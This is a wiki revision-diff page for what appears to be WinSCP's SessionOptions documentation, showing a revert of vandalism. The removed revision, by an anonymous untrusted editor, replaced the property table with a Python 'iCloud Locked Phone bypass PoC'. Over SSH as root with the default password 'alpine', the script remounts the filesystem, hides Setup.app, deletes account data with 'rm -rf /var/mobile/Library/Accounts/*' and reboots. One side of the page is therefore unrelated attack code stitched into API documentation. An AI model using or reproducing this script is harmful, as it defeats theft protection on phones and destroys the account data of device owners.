Differences
This shows you the differences between the selected revisions of the page.
| 2021-09-01 | 2021-09-01 | ||
| hi (75.155.85.24) (hidden) (untrusted) | Restored revision 1630049237. Undoing revision 1630510358. (martin) (hidden) | ||
| Line 21: | Line 21: | ||
| | SessionOptions() | Default constructor. | | | SessionOptions() | Default constructor. | | ||
| - | """ | + | ===== [[properties]] Properties ===== |
| - | iCloud Locked Phone bypass PoC | + | ^ Name ^ Description ^ |
| - | you need to get the SSH server on your iDevice running first | + | | FtpMode ==FtpMode== | [[ftp_modes|FTP mode]]. Possible values are ''FtpMode.Passive'' (default) and ''FtpMode.Active''. | |
| - | """ | + | | FtpSecure ==FtpSecure== | [[ftps#methods|FTPS mode]]. Possible values are ''FtpSecure.None'' (default), ''FtpSecure.Implicit'' and ''FtpSecure.Explicit''. | |
| - | import subprocess | + | | <del>bool ==GiveUpSecurityAndAcceptAnySshHostKey==</del> | Give up security and accept any [[ssh_verifying_the_host_key|SSH host key]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#sshhostkeyfingerprint|''SshHostKeyFingerprint'']]. //Obsoleted, use [[#sshhostkeypolicy|''SshHostKeyPolicy.GiveUpSecurityAndAcceptAny'']] instead.// &recent | |
| - | import paramiko | + | | bool ==GiveUpSecurityAndAcceptAnyTlsHostCertificate== | Give up security and accept any FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#tlshostcertificatefingerprint|''TlsHostCertificateFingerprint'']]. | |
| - | + | | string ==HostName== | Name or IP of the host to connect to. Mandatory property. In a form of ''example.com'' or ''192.0.2.0''. | | |
| - | RPORT = 44 | + | | string ==Name== | Returns a generated name of a session, based on available information -- typically ''UserName@HostName''. Read-only. | |
| - | LPORT = 2222 | + | | string ==NewPassword== | When set, tries to [[task_change_password|change password]] to the new one. | |
| - | password = "alpine" | + | | string ==Password== | Password for authentication. | |
| - | + | | int ==PortNumber== | Port number to connect to. Keep default ''0'' to use the default port for the protocol. | | |
| - | iproxy = subprocess.Popen(["iproxy", str(LPORT), str(RPORT)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) | + | | string ==PrivateKeyPassphrase== | Passphrase for encrypted private keys and client certificates. | |
| - | ssh = paramiko.SSHClient() | + | | Protocol ==Protocol== | Protocol to use for the session. Possible values are ''Protocol.Sftp'' (default), ''Protocol.Scp'', ''Protocol.Ftp'', ''Protocol.Webdav'' and ''Protocol.%%S3%%''. | |
| - | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | + | | string ==RootPath== | WebDAV root path or S3 bucket path. Set, when the HTTP server root or S3 bucket list is not accessible. | |
| - | print("Initiating SSH connection") | + | | [[dotnet>system.security.securestring|SecureString]] ==SecureNewPassword== | When set, tries to [[task_change_password|change password]] to the new one. Use instead of [[#newpassword|''NewPassword'']] to reduce a number of unencrypted copies of the password in memory. | |
| - | while True: | + | | [[dotnet>system.security.securestring|SecureString]] ==SecurePassword== | Encrypted password for authentication. Use instead of [[#password|''Password'']] to reduce a number of unencrypted copies of the password in memory. | |
| - | ···try: | + | | [[dotnet>system.security.securestring|SecurePrivateKeyPassphrase]] ==SecurePrivateKeyPassphrase== | Encrypted passphrase for encrypted private keys and client certificates. Use instead of [[#privatekeypassphrase|''PrivateKeyPassphrase'']] to reduce a number of unencrypted copies of the passphrase in memory. | |
| - | ·······ssh.connect('localhost', username='root', password=password, port=LPORT) | + | | string ==SshHostKeyFingerprint== | Fingerprint of SSH server [[ssh_verifying_the_host_key|host key]] (or several alternative fingerprints separated by semicolon). It makes WinSCP automatically [[scripting#hostkey|accept host key]] with the fingerprint. Use SHA-256 fingerprint of the host key. Mandatory for SFTP/SCP protocol.((You can leave the property ''null'', if you set [[#giveupsecurityandacceptanysshhostKey|''GiveUpSecurityAndAcceptAnySshHostKey'']].)) //Learn how to [[faq_hostkey|obtain host key fingerprint]]//.··| |
| - | ·······break | + | | SshHostKeyPolicy ==SshHostKeyPolicy== | SSH host key policy. Use the default ''SshHostKeyPolicy.Check'' to [[ssh_verifying_the_host_key|verify the host key]] against [[#sshhostkeyfingerprint|''SshHostKeyFingerprint'']]. Use ''SshHostKeyPolicy.GiveUpSecurityAndAcceptAny'' to give up a security and accept any SSH host key. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. Use ''SshHostKeyPolicy.AcceptNew'' to automatically accept host key of new hosts. The known keys are cached in registry. | |
| - | ···except: | + | | string ==SshPrivateKeyPath== | Full path to SSH [[public_key#private|private key file]]. | |
| - | ·······print("Failed, retrying") | + | | string ==TlsClientCertificatePath== | Full path to [[tls#client_certificate|TLS/SSL client certificate]]. | |
| - | ·······continue | + | | string ==TlsHostCertificateFingerprint== | Fingerprint of FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]] to be automatically accepted (useful for certificates signed by an untrusted authority). Use SHA-256 fingerprint of the certificate. | |
| - | print("Connection established") | + | | TimeSpan ==Timeout== | Server response timeout. Defaults to 15 seconds. | |
| - | print("Mounting filesystem as read/write") | + | | int ==TimeoutInMilliseconds== | Alternative to [[#timeout|''Timeout'']]. Particularly useful for COM hosts, that cannot use ''TimeSpan'', such as Visual Basic. | |
| - | ssh.exec_command("mount -o rw,union,update /") | + | | string ==UserName== | Username for authentication. Mandatory property. | |
| - | print("Cleaning mount_rw file") | + | | bool ==WebdavSecure== | Use WebDAVS (WebDAV over TLS/SSL), instead of WebDAV. | |
| - | ssh.exec_command('echo "" > /.mount_rw') | + | |
| - | print("Hiding Setup.app") | + | |
| - | ssh.exec_command("mv /Application/Setup.app /Application/Setup.app.backup") | + | |
| - | print("Clearing UI cache") | + | |
| - | ssh.exec_command("uicache --all") | + | |
| - | print("Clearing iCloud user") | + | |
| - | ssh.exec_command("rm -rf /var/mobile/Library/Accounts/*") | + | |
| - | print("Respringing device") | + | |
| - | ssh.exec_command("killall backboardd") | + | |
| - | print("Finishing exploit script") | + | |
| - | print("Restarting your device") | + | |
| - | ssh.exec_command("reboot") | + | |
| - | iproxy.terminate() | + | |
| - | iproxy.kill() | + | |
| ===== Methods ===== | ===== Methods ===== | ||